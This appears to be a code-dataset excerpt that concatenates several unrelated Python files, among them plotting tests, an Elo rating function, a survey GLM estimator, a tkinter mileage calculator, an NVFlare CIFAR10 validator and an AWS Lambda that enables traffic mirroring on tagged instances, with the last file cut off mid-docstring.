"""Test ploting a space with only 1 dim"""
mock_train_regressor(monkeypatch)
config = mock_space(y=None)
mock_experiment(monkeypatch, y="drop")
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment, n_grid_points=5, model_kwargs=dict(random_state=1)
)
assert_partial_dependencies_plot(plot, dims=["x"], n_grid_points=5)
def test_select_params(self, monkeypatch):
"""Test selecting subset"""
mock_train_regressor(monkeypatch)
config = mock_space(z="uniform(0, 1)")
mock_experiment(monkeypatch, z=[0, 0.1, 0.2, 0.5])
for params in [["x"], ["x", "y"], ["y", "z"]]:
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
params=params,
n_grid_points=5,
model_kwargs=dict(random_state=1),
)
assert_partial_dependencies_plot(plot, dims=params, n_grid_points=5)
def test_custom_smoothing(self, monkeypatch):
"""Test changing smoothing value"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=5,
model_kwargs=dict(random_state=1),
smoothing=1.2,
)
with pytest.raises(AssertionError):
assert_partial_dependencies_plot(plot, dims=["x", "y"], n_grid_points=5)
assert_partial_dependencies_plot(
plot, dims=["x", "y"], n_grid_points=5, smoothing=1.2
)
def test_custom_n_grid_points(self, monkeypatch):
"""Test changing n_grid_points value"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=10,
model_kwargs=dict(random_state=1),
)
with pytest.raises(AssertionError):
assert_partial_dependencies_plot(plot, dims=["x", "y"], n_grid_points=5)
assert_partial_dependencies_plot(plot, dims=["x", "y"], n_grid_points=10)
def test_custom_n_samples(self, monkeypatch):
"""Test changing n_samples value"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(monkeypatch)
PARAMS = ["x", "y"]
N_SAMPLES = numpy.random.randint(20, 50)
def mock_partial_dependency_grid(space, model, params, samples, n_points):
print(samples)
assert samples.shape == (N_SAMPLES, len(PARAMS))
return partial_dependency_grid(space, model, params, samples, n_points)
monkeypatch.setattr(
"orion.analysis.partial_dependency_utils.partial_dependency_grid",
mock_partial_dependency_grid,
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=10,
model_kwargs=dict(random_state=1),
n_samples=N_SAMPLES,
)
def test_custom_colorscale(self, monkeypatch):
"""Test changing colorscale"""
mock_train_regressor(monkeypatch)
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=5,
colorscale="Viridis",
model_kwargs=dict(random_state=1),
)
with pytest.raises(AssertionError):
assert_partial_dependencies_plot(
plot, dims=["x", "y"], n_grid_points=5, custom_colorscale=False
)
assert_partial_dependencies_plot(
plot, dims=["x", "y"], n_grid_points=5, custom_colorscale=True
)
def test_custom_model(self, monkeypatch):
"""Test changing type of regression model"""
mock_train_regressor(monkeypatch, assert_model="BaggingRegressor")
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=5,
model="BaggingRegressor",
model_kwargs=dict(random_state=1),
)
def test_custom_model_kwargs(self, monkeypatch):
"""Test changing arguments of regression model"""
mock_train_regressor(monkeypatch, assert_model_kwargs=dict(random_state=1))
config = mock_space()
mock_experiment(monkeypatch)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = partial_dependencies(
experiment,
n_grid_points=5,
model_kwargs=dict(random_state=1),
)
@pytest.mark.usefixtures("version_XYZ")
class TestRankings:
"""Tests the ``rankings()`` method provided by the plotly backend"""
def test_requires_argument(self):
"""Tests that the experiment data are required."""
with pytest.raises(ValueError):
rankings(None)
def test_returns_plotly_object(self, monkeypatch):
"""Tests that the plotly backend returns a plotly object"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings([experiment, experiment])
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self, monkeypatch):
"""Tests the layout of the plot"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings([experiment])
assert_rankings_plot(plot, [f"{experiment.name}-v{experiment.version}"])
def test_list_of_experiments(self, monkeypatch):
"""Tests the rankings with list of experiments"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
child = orion.client.create_experiment(
experiment.name, branching={"branch_to": "child"}
)
plot = rankings([experiment, child])
# Exps are sorted alphabetically by names.
assert_rankings_plot(
plot, [f"{exp.name}-v{exp.version}" for exp in [child, experiment]]
)
def test_list_of_experiments_name_conflict(self, monkeypatch):
"""Tests the rankings with list of experiments with the same name"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
child = orion.client.create_experiment(
experiment.name, branching={"branch_to": experiment.name}
)
assert child.name == experiment.name
assert child.version == experiment.version + 1
plot = rankings([experiment, child])
# Exps are sorted alphabetically by names.
assert_rankings_plot(
plot, [f"{exp.name}-v{exp.version}" for exp in [experiment, child]]
)
def test_dict_of_experiments(self, monkeypatch):
"""Tests the rankings with renamed experiments"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings({"exp-1": experiment, "exp-2": experiment})
assert_rankings_plot(plot, ["exp-1", "exp-2"])
def test_list_of_dict_of_experiments(self, monkeypatch):
"""Tests the rankings with avg of competitions"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings(
[{"exp-1": experiment, "exp-2": experiment} for _ in range(10)]
)
assert_rankings_plot(plot, ["exp-1", "exp-2"], with_avg=True)
def test_dict_of_list_of_experiments(self, monkeypatch):
"""Tests the rankings with avg of experiments separated in lists"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings({"exp-1": [experiment] * 10, "exp-2": [experiment] * 10})
assert_rankings_plot(plot, ["exp-1", "exp-2"], with_avg=True)
def test_unbalanced_experiments(self, monkeypatch):
"""Tests the regrets with avg of unbalanced experiments"""
mock_experiment_with_random_to_pandas(monkeypatch, unbalanced=True)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = rankings({"exp-1": [experiment] * 10, "exp-2": [experiment] * 10})
assert_rankings_plot(plot, ["exp-1", "exp-2"], with_avg=True, balanced=0)
def test_ignore_uncompleted_statuses(self, monkeypatch):
"""Tests that uncompleted statuses are ignored"""
mock_experiment_with_random_to_pandas(
monkeypatch,
status=[
"completed",
"new",
"reserved",
"completed",
"broken",
"completed",
"interrupted",
"completed",
],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = rankings([experiment])
assert_rankings_plot(
plot, [f"{experiment.name}-v{experiment.version}"], balanced=4
)
def test_unsupported_order_key(self):
"""Tests that unsupported order keys are rejected"""
with create_experiment(config, trial_config) as (_, _, experiment):
with pytest.raises(ValueError):
rankings([experiment], order_by="unsupported")
@pytest.mark.usefixtures("version_XYZ")
class TestRegret:
"""Tests the ``regret()`` method provided by the plotly backend"""
def test_requires_argument(self):
"""Tests that the experiment data are required."""
with pytest.raises(ValueError):
regret(None)
def test_returns_plotly_object(self):
"""Tests that the plotly backend returns a plotly object"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regret(experiment)
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self):
"""Tests the layout of the plot"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regret(experiment)
assert_regret_plot(plot)
def test_experiment_worker_as_parameter(self):
"""Tests that ``Experiment`` is a valid parameter"""
with create_experiment(config, trial_config, ["completed"]) as (
_,
experiment,
_,
):
plot = regret(experiment)
assert_regret_plot(plot)
def test_ignore_uncompleted_statuses(self):
"""Tests that uncompleted statuses are ignored"""
with create_experiment(config, trial_config) as (_, _, experiment):
plot = regret(experiment)
assert_regret_plot(plot)
def test_unsupported_order_key(self):
"""Tests that unsupported order keys are rejected"""
with create_experiment(config, trial_config) as (_, _, experiment):
with pytest.raises(ValueError):
regret(experiment, order_by="unsupported")
@pytest.mark.usefixtures("version_XYZ")
class TestRegrets:
"""Tests the ``regrets()`` method provided by the plotly backend"""
def test_requires_argument(self):
"""Tests that the experiment data are required."""
with pytest.raises(ValueError):
regrets(None)
def test_returns_plotly_object(self, monkeypatch):
"""Tests that the plotly backend returns a plotly object"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regrets([experiment])
assert type(plot) is plotly.graph_objects.Figure
def test_graph_layout(self, monkeypatch):
"""Tests the layout of the plot"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regrets([experiment])
assert_regrets_plot(plot, [f"{experiment.name}-v{experiment.version}"])
def test_list_of_experiments(self, monkeypatch):
"""Tests the regrets with list of experiments"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
child = orion.client.create_experiment(
experiment.name, branching={"branch_to": "child"}
)
plot = regrets([experiment, child])
# Exps are sorted alphabetically by names.
assert_regrets_plot(
plot, [f"{exp.name}-v{exp.version}" for exp in [child, experiment]]
)
def test_list_of_experiments_name_conflict(self, monkeypatch):
"""Tests the regrets with list of experiments with the same name"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
child = orion.client.create_experiment(
experiment.name, branching={"branch_to": experiment.name}
)
assert child.name == experiment.name
assert child.version == experiment.version + 1
plot = regrets([experiment, child])
# Exps are sorted alphabetically by names.
assert_regrets_plot(
plot, [f"{exp.name}-v{exp.version}" for exp in [experiment, child]]
)
def test_dict_of_experiments(self, monkeypatch):
"""Tests the regrets with renamed experiments"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regrets({"exp-1": experiment, "exp-2": experiment})
assert_regrets_plot(plot, ["exp-1", "exp-2"])
def test_dict_of_list_of_experiments(self, monkeypatch):
"""Tests the regrets with avg of experiments"""
mock_experiment_with_random_to_pandas(monkeypatch)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regrets({"exp-1": [experiment] * 10, "exp-2": [experiment] * 10})
assert_regrets_plot(plot, ["exp-1", "exp-2"], with_avg=True)
def test_unbalanced_experiments(self, monkeypatch):
"""Tests the regrets with avg of unbalanced experiments"""
mock_experiment_with_random_to_pandas(monkeypatch, unbalanced=True)
with create_experiment(config, trial_config, ["completed"]) as (
_,
_,
experiment,
):
plot = regrets({"exp-1": [experiment] * 10, "exp-2": [experiment] * 10})
assert_regrets_plot(plot, ["exp-1", "exp-2"], with_avg=True, balanced=0)
def test_ignore_uncompleted_statuses(self, monkeypatch):
"""Tests that uncompleted statuses are ignored"""
mock_experiment_with_random_to_pandas(
monkeypatch,
status=[
"completed",
"new",
"reserved",
"completed",
"broken",
"completed",
"interrupted",
"completed",
],
)
with create_experiment(config, trial_config) as (_, _, experiment):
plot = regrets([experiment])
assert_regrets_plot(
plot, [f"{experiment.name}-v{experiment.version}"], balanced=4
)
def test_unsupported_order_key(self):
"""Tests that unsupported order keys are rejected"""
with create_experiment(config, trial_config) as (_, _, experiment):
with pytest.raises(ValueError):
regrets([experiment], order_by="unsupported")
| 2.0625 | 2 |
autodiff/debug_vjp.py | Jakob-Unfried/msc-legacy | 1 | 7824 | import pdb
import warnings
from jax import custom_vjp
@custom_vjp
def debug_identity(x):
"""
acts as identity, but inserts a pdb trace on the backwards pass
"""
warnings.warn('Using a module intended for debugging')
return x
def _debug_fwd(x):
warnings.warn('Using a module intended for debugging')
return x, x
# noinspection PyUnusedLocal
def _debug_bwd(x, g):
pdb.set_trace()
return g
debug_identity.defvjp(_debug_fwd, _debug_bwd)
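# Illustrative usage sketch (added commentary, not part of the original module):
# wrapping an intermediate value in debug_identity pauses in pdb when the gradient
# flows back through that point. The toy loss below is a made-up example.
if __name__ == "__main__":
    import jax.numpy as jnp
    from jax import grad
    def _toy_loss(x):
        h = x ** 2
        h = debug_identity(h)  # pdb.set_trace() fires here on the backward pass
        return jnp.sum(h)
    grad(_toy_loss)(jnp.ones(3))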
| 2.28125 | 2 |
mileage.py | vwfinley/mileage | 0 | 7825 | #!/usr/bin/env python
# Some helpful links
# https://docs.python.org/3/library/tkinter.html
# https://www.python-course.eu/tkinter_entry_widgets.php
import tkinter as tk
class Application(tk.Frame):
def __init__(self, root=None):
super().__init__(root)
self.root = root
self.root.title("Mileage")
self.root.geometry("250x125")
self.pack()
        self.miles = tk.Entry(self)
        self.gallons = tk.Entry(self)
self.mpg = tk.Label(self)
self.init_widgets()
def init_widgets(self):
self.miles.grid(row=0)
tk.Label(self, text="Miles").grid(row=0, column=1)
self.gallons.grid(row=1)
tk.Label(self, text="Gallons").grid(row=1, column=1)
self.mpg.grid(row=2)
tk.Label(self, text="MPG").grid(row=2, column=1)
tk.Button(self, text="Calculate", command = self.calculate).grid(row=3, column=1)
tk.Button(self, text="Quit", command=self.root.destroy).grid(row=4, column=1)
def calculate(self):
self.mpg['text'] = float(self.miles.get()) / float(self.gallons.get())
app = Application(root=tk.Tk())
app.mainloop()
| 4.0625 | 4 |
rankings/elo.py | ulternate/table_tennis_league | 0 | 7826 | def elo(winner_rank, loser_rank, weighting):
"""
    :param winner_rank: The current rank of the Player that won the match.
    :param loser_rank: The current rank of the Player that lost the match.
    :param weighting: The weighting (K) factor to suit your competition.
:return: (winner_new_rank, loser_new_rank) Tuple.
This follows the ELO ranking method.
"""
winner_rank_transformed = 10 ** (winner_rank / 400)
opponent_rank_transformed = 10 ** (loser_rank / 400)
transformed_sum = winner_rank_transformed + opponent_rank_transformed
winner_score = winner_rank_transformed / transformed_sum
loser_score = opponent_rank_transformed / transformed_sum
winner_rank = winner_rank + weighting * (
1 - winner_score)
loser_rank = loser_rank - weighting * loser_score
# Set a floor of 100 for the rankings.
winner_rank = 100 if winner_rank < 100 else winner_rank
loser_rank = 100 if loser_rank < 100 else loser_rank
winner_rank = float('{result:.2f}'.format(result=winner_rank))
loser_rank = float('{result:.2f}'.format(result=loser_rank))
return winner_rank, loser_rank
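# Example usage (illustrative only; the ratings and K-factor below are arbitrary):
# a 1600-rated player beats a 1400-rated player with a weighting of 32, so the
# winner gains roughly 7.7 points and the loser drops by the same amount.
if __name__ == "__main__":
    new_winner_rank, new_loser_rank = elo(1600, 1400, 32)
    print(new_winner_rank, new_loser_rank)  # approximately 1607.69, 1392.31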
| 3.75 | 4 |
src/samplics/regression/glm.py | samplics-org/samplics | 14 | 7827 | <gh_stars>10-100
from __future__ import annotations
from typing import Any, Callable, Optional, Union
import numpy as np
# import pandas as pd
import statsmodels.api as sm
from samplics.estimation.expansion import TaylorEstimator
from samplics.utils.formats import dict_to_dataframe, fpc_as_dict, numpy_array, remove_nans
from samplics.utils.types import Array, Number, Series, StringNumber
class SurveyGLM:
"""General linear models under complex survey sampling"""
def __init__(self):
self.beta: np.ndarray
@staticmethod
    def _residuals(e: np.ndarray, psu: np.ndarray, nb_vars: Number) -> tuple[np.ndarray, Number]:
psus = np.unique(psu)
if psus.shape[0] == 1 and e.shape[0] == 1:
raise AssertionError("Only one observation in the stratum")
if psus.shape[0] == 1:
psu = np.arange(e.shape[0])
psus = np.unique(psu)
e_values = np.zeros((psus.shape[0], nb_vars))
for i, p in enumerate(np.unique(psus)):
e_values[i, :] += np.sum(e[psu == p, :], axis=0)
e_means = np.sum(e_values, axis=0) / psus.shape[0]
return np.transpose(e_values - e_means) @ (e_values - e_means), psus.shape[0]
def _calculate_g(
self,
samp_weight: np.ndarray,
resid: np.ndarray,
x: np.ndarray,
stratum: Optional[np.ndarray],
psu: Optional[np.ndarray],
fpc: Union[dict[StringNumber, Number], Number],
glm_scale=Number,
) -> np.ndarray:
e = (samp_weight * resid)[:, None] * x / glm_scale
if psu is None:
psu = np.arange(e.shape[0])
if stratum is None:
e_h, n_h = self._residuals(e=e, psu=psu, nb_vars=x.shape[1])
return fpc * (n_h / (n_h - 1)) * e_h
else:
g_h = np.zeros((x.shape[1], x.shape[1]))
for s in np.unique(stratum):
e_s = e[stratum == s, :]
psu_s = psu[stratum == s]
e_h, n_h = self._residuals(e=e_s, psu=psu_s, nb_vars=x.shape[1])
g_h += fpc[s] * (n_h / (n_h - 1)) * e_h
return g_h
def estimate(
self,
y: Array,
x: Optional[Array] = None,
samp_weight: Optional[Array] = None,
stratum: Optional[Series] = None,
psu: Optional[Series] = None,
fpc: Union[dict[StringNumber, Number], Series, Number] = 1.0,
remove_nan: bool = False,
) -> None:
y = numpy_array(y)
y_temp = y.copy()
x = numpy_array(x) if x is not None else None
psu = numpy_array(psu) if psu is not None else None
if samp_weight is None:
weight_temp = np.ones(y.shape[0])
elif isinstance(samp_weight, (float, int)):
weight_temp = samp_weight * np.ones(y_temp.shape[0])
elif isinstance(samp_weight, np.ndarray):
weight_temp = samp_weight.copy()
else:
weight_temp = np.asarray(samp_weight)
if not isinstance(fpc, dict):
self.fpc = fpc_as_dict(stratum, fpc)
else:
if list(np.unique(stratum)) != list(fpc.keys()):
raise AssertionError("fpc dictionary keys must be the same as the strata!")
else:
self.fpc = fpc
glm_model = sm.GLM(endog=y_temp, exog=x, var_weights=weight_temp)
glm_results = glm_model.fit()
g = self._calculate_g(
            samp_weight=weight_temp,  # use the normalized weights computed above
resid=glm_results.resid_response,
x=x,
stratum=stratum,
psu=psu,
fpc=self.fpc,
glm_scale=glm_results.scale,
)
d = glm_results.cov_params()
self.beta = glm_results.params
self.cov_beta = (d @ g) @ d
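# Minimal usage sketch (illustrative only): the synthetic data, strata and PSU
# layout below are assumptions made for demonstration, not part of samplics.
if __name__ == "__main__":
    rng = np.random.default_rng(12345)
    n = 100
    x_mat = np.column_stack([np.ones(n), rng.normal(size=n)])
    y_vec = x_mat @ np.array([1.0, 2.0]) + rng.normal(size=n)
    weights = rng.uniform(0.5, 1.5, size=n)
    strata = np.repeat([1, 2], n // 2)
    psus = np.tile(np.arange(10), n // 10)
    svyglm = SurveyGLM()
    svyglm.estimate(y=y_vec, x=x_mat, samp_weight=weights, stratum=strata, psu=psus)
    print(svyglm.beta)      # point estimates
    print(svyglm.cov_beta)  # design-based covariance of the estimates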
| 2.125 | 2 |
tests/test_scopes.py | leg100/scopes | 0 | 7828 | <filename>tests/test_scopes.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `scopes` package."""
import os
print(os.getenv('PYTHONPATH'))
import pytest
from click.testing import CliRunner
from scopes.tasks import tasks, bolt, spout, builder
from scopes.graph import G, build, topological_sort, traverse
from scopes import cli
@pytest.fixture
def response():
"""Sample pytest fixture.
See more at: http://doc.pytest.org/en/latest/fixture.html
"""
# import requests
# return requests.get('https://github.com/audreyr/cookiecutter-pypackage')
def test_content(response):
"""Sample pytest test function with the pytest fixture as an argument."""
# from bs4 import BeautifulSoup
# assert 'GitHub' in BeautifulSoup(response.content).title.string
def test_command_line_interface():
"""Test the CLI."""
runner = CliRunner()
result = runner.invoke(cli.main)
assert result.exit_code == 0
assert 'scopes.cli.main' in result.output
help_result = runner.invoke(cli.main, ['--help'])
assert help_result.exit_code == 0
assert '--help Show this message and exit.' in help_result.output
# t1---
# | |
# v v
# t2 t3
# \ / t4
# v |
# t5<----/
@pytest.fixture
def example():
tasks.clear()
G.clear()
@spout({'x': None})
def t1():
yield {'x': 'east'}
yield {'x': 'west'}
@bolt({'y': None}, lambda d: 'x' in d)
def t2(dep):
return {'y': 1, **dep}
@bolt({'z': None}, lambda d: d == {'x': None})
def t3(dep):
return {'z': 1, **dep}
@spout({'c': None})
def t4():
yield {'c': 4, 'x': 'east'}
yield {'c': 5, 'x': 'west'}
@builder({'a': 2}, lambda _: True, 'x')
def t5(obj, dep):
obj.update(dep)
def test_task_decorator(example):
assert len(tasks) == 5
assert callable(tasks[0].func)
assert tasks[0].obj == {'x': None}
def test_task_dag(example):
build(tasks)
assert len(G) == 5
assert len(G.edges) == 6
def test_task_traversal(example):
build(tasks)
nodes = topological_sort()
results = traverse(nodes)
assert results == {
't1': [{'x': 'east'}, {'x': 'west'}],
't2': [{'x': 'east', 'y': 1}, {'x': 'west', 'y': 1}],
't3': [{'x': 'east', 'z': 1}, {'x': 'west', 'z': 1}],
't4': [{'x': 'east', 'c': 4}, {'x': 'west', 'c': 5}],
't5': [
{'a': 2, 'x': 'east', 'y': 1, 'z': 1, 'c': 4},
{'a': 2, 'x': 'west', 'y': 1, 'z': 1, 'c': 5}
]
}
| 2.328125 | 2 |
timeparse/LunarSolarConverter/__init__.py | tornadoyi/timeparse | 0 | 7829 | # -*- coding: utf-8 -*-
__author__ = 'isee15'
import LunarSolarConverter
converter = LunarSolarConverter.LunarSolarConverter()
def LunarToSolar(year, month, day, isleap = False):
lunar = LunarSolarConverter.Lunar(year, month, day, isleap)
solar = converter.LunarToSolar(lunar)
return (solar.solarYear, solar.solarMonth, solar.solarDay)
def SolarToLunar(year, month, day):
solar = LunarSolarConverter.Solar(year, month, day)
lunar = converter.SolarToLunar(solar)
return (lunar.lunarYear, lunar.lunarMonth, lunar.lunarDay)
def LunarMonthDays(year, month, isleap = False):
converter = LunarSolarConverter.LunarSolarConverter
days = converter.lunar_month_days[year - converter.lunar_month_days[0]]
leap = LunarSolarConverter.GetBitInt(days, 4, 13)
offset = 0
loopend = leap
if not isleap:
if month <= leap or leap == 0:
loopend = month - 1
else:
loopend = month
days = LunarSolarConverter.GetBitInt(days, 1, 12 - loopend) == 1 and 30 or 29
return days
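# Example usage (illustrative; assumes the module-level converter above resolves its
# imports as-is, and the exact values depend on the converter's internal tables):
if __name__ == "__main__":
    print(SolarToLunar(2018, 10, 1))   # e.g. (2018, 8, 22): solar -> lunar
    print(LunarToSolar(2018, 8, 22))   # round-trips back to (2018, 10, 1)
    print(LunarMonthDays(2018, 8))     # number of days in that lunar month (29 or 30)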
| 3.21875 | 3 |
examples/hello-pt/custom/cifar10validator.py | ArnovanHilten/NVFlare | 155 | 7830 | # Copyright (c) 2021, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
from torch.utils.data import DataLoader
from torchvision.datasets import CIFAR10
from torchvision.transforms import Compose, ToTensor, Normalize
from nvflare.apis.dxo import from_shareable, DataKind, DXO
from nvflare.apis.executor import Executor
from nvflare.apis.fl_constant import ReturnCode
from nvflare.apis.fl_context import FLContext
from nvflare.apis.shareable import Shareable, make_reply
from nvflare.apis.signal import Signal
from nvflare.app_common.app_constant import AppConstants
from simple_network import SimpleNetwork
class Cifar10Validator(Executor):
def __init__(self, validate_task_name=AppConstants.TASK_VALIDATION):
super(Cifar10Validator, self).__init__()
self._validate_task_name = validate_task_name
# Setup the model
self.model = SimpleNetwork()
self.device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
self.model.to(self.device)
# Preparing the dataset for testing.
transforms = Compose([
ToTensor(),
Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
self.test_data = CIFAR10(root='~/data', train=False, transform=transforms)
self.test_loader = DataLoader(self.test_data, batch_size=4, shuffle=False)
def execute(self, task_name: str, shareable: Shareable, fl_ctx: FLContext, abort_signal: Signal) -> Shareable:
if task_name == self._validate_task_name:
model_owner = "?"
try:
try:
dxo = from_shareable(shareable)
except:
self.log_error(fl_ctx, "Error in extracting dxo from shareable.")
return make_reply(ReturnCode.BAD_TASK_DATA)
# Ensure data_kind is weights.
if not dxo.data_kind == DataKind.WEIGHTS:
self.log_exception(fl_ctx, f"DXO is of type {dxo.data_kind} but expected type WEIGHTS.")
return make_reply(ReturnCode.BAD_TASK_DATA)
# Extract weights and ensure they are tensor.
model_owner = shareable.get_header(AppConstants.MODEL_OWNER, "?")
weights = {k: torch.as_tensor(v, device=self.device) for k, v in dxo.data.items()}
# Get validation accuracy
val_accuracy = self.do_validation(weights, abort_signal)
if abort_signal.triggered:
return make_reply(ReturnCode.TASK_ABORTED)
self.log_info(fl_ctx, f"Accuracy when validating {model_owner}'s model on"
f" {fl_ctx.get_identity_name()}"f's data: {val_accuracy}')
dxo = DXO(data_kind=DataKind.METRICS, data={'val_acc': val_accuracy})
return dxo.to_shareable()
except:
self.log_exception(fl_ctx, f"Exception in validating model from {model_owner}")
return make_reply(ReturnCode.EXECUTION_EXCEPTION)
else:
return make_reply(ReturnCode.TASK_UNKNOWN)
def do_validation(self, weights, abort_signal):
self.model.load_state_dict(weights)
self.model.eval()
correct = 0
total = 0
with torch.no_grad():
for i, (images, labels) in enumerate(self.test_loader):
if abort_signal.triggered:
return 0
images, labels = images.to(self.device), labels.to(self.device)
output = self.model(images)
_, pred_label = torch.max(output, 1)
correct += (pred_label == labels).sum().item()
total += images.size()[0]
metric = correct/float(total)
return metric
| 1.859375 | 2 |
lambda/enable-traffic-mirroring.py | wrharding/aws-infra | 1 | 7831 | # MIT License
# Copyright (c) 2020-2021 <NAME> (https://www.chrisfarris.com)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import boto3
from botocore.exceptions import ClientError
import json
import os
import logging
logger = logging.getLogger()
logger.setLevel(getattr(logging, os.getenv('LOG_LEVEL', default='INFO')))
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
TAG_KEY=os.getenv('TAG_KEY', default='WireShark')
def handler(event, context):
logger.debug("Received event: " + json.dumps(event, sort_keys=True))
ec2_client = boto3.client('ec2')
mirror_sessions = ec2_client.describe_traffic_mirror_sessions()['TrafficMirrorSessions']
enabled_enis = []
max_session_id = 0
for s in mirror_sessions:
enabled_enis.append(s['NetworkInterfaceId'])
if s['SessionNumber'] > max_session_id:
max_session_id = s['SessionNumber']
response = ec2_client.describe_instances(
Filters=[
{'Name': 'instance-state-name', 'Values': ['running']},
],
MaxResults=1000 # I should never need to paginate.
)
for r in response['Reservations']:
for i in r['Instances']:
if not i['InstanceType'].startswith("t3"):
logger.debug(f"Instance {i['InstanceId']} is not a t3 and does not support Traffic Mirroring")
continue
for tag in i['Tags']:
if tag['Key'] == TAG_KEY:
# See if a mirror session is setup
for eni in i['NetworkInterfaces']:
if eni['NetworkInterfaceId'] not in enabled_enis:
logger.info(f"ENI {eni['NetworkInterfaceId']} on Instance {i['InstanceId']} needs Mirroring Enabled")
max_session_id += 1
enable_traffic_mirroring(ec2_client, eni['NetworkInterfaceId'], i['InstanceId'], max_session_id)
else:
logger.debug(f"ENI {eni['NetworkInterfaceId']} on Instance {i['InstanceId']} is already Enabled")
def enable_traffic_mirroring(ec2_client, eni, instance_id, session_id):
response = ec2_client.create_traffic_mirror_session(
NetworkInterfaceId=eni,
TrafficMirrorTargetId=os.environ['TARGET_ID'],
TrafficMirrorFilterId=os.environ['FILTER_ID'],
SessionNumber=session_id,
Description=f"Enabled by Lambda for {instance_id}"
)
## END OF FUNCTION ##
if __name__ == '__main__':
# Logging idea stolen from: https://docs.python.org/3/howto/logging.html#configuring-logging
# create console handler and set level to debug
ch = logging.StreamHandler()
logger.setLevel(logging.DEBUG)
# create formatter
# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
formatter = logging.Formatter('%(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
logger.addHandler(ch)
try:
handler(None, None)
except KeyboardInterrupt:
exit(1)
| 1.554688 | 2 |
src/value_function.py | wu6u3/async_trpo | 6 | 7832 | <reponame>wu6u3/async_trpo
"""
State-Value Function
Written by <NAME> (pat-coady.github.io)
Modified by <NAME> (wu6u3) into asynchronous version
"""
import tensorflow as tf
import numpy as np
from sklearn.utils import shuffle
#import os
class NNValueFunction(object):
""" NN-based state-value function """
def __init__(self, obs_dim, hid1_mult, thread_idx, shared_nn):
"""
Args:
obs_dim: number of dimensions in observation vector (int)
